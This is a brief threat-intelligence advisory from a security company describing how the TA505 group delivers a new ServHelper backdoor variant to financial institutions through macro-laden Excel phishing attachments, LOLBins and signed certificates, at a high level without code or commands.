Contact Contact Us

New ServHelper Backdoor Variant Threatens Financial Institutions

Russian cybercriminal group TA505 has been deploying a new variant of the ServHelper backdoor against large financial institutions globally, including those in Asia. The group continues to use spear phishing emails with a macro-laden Excel spreadsheet attachment to achieve initial compromise. When the macro is activated, it invokes the Windows OS process msiexec.exe to download the ServHelper backdoor. The new ServHelper variant uses Living-off-the-Land Binaries (LOLBins) to collect system information and valid Sectigo (formerly known as Comodo) digital certificates to evade detection. The group will only install additional tools to maintain persistence if the compromised host is determined to be valuable.

[1] Threat Actor TA505 Targets Financial Enterprises Using LOLBins And A New Backdoor Malware

Ensign InfoSecurity Singapore
30A Kallang Place
Singapore 339213

Tel: +65 6788 2882
Fax: +65 6788 3883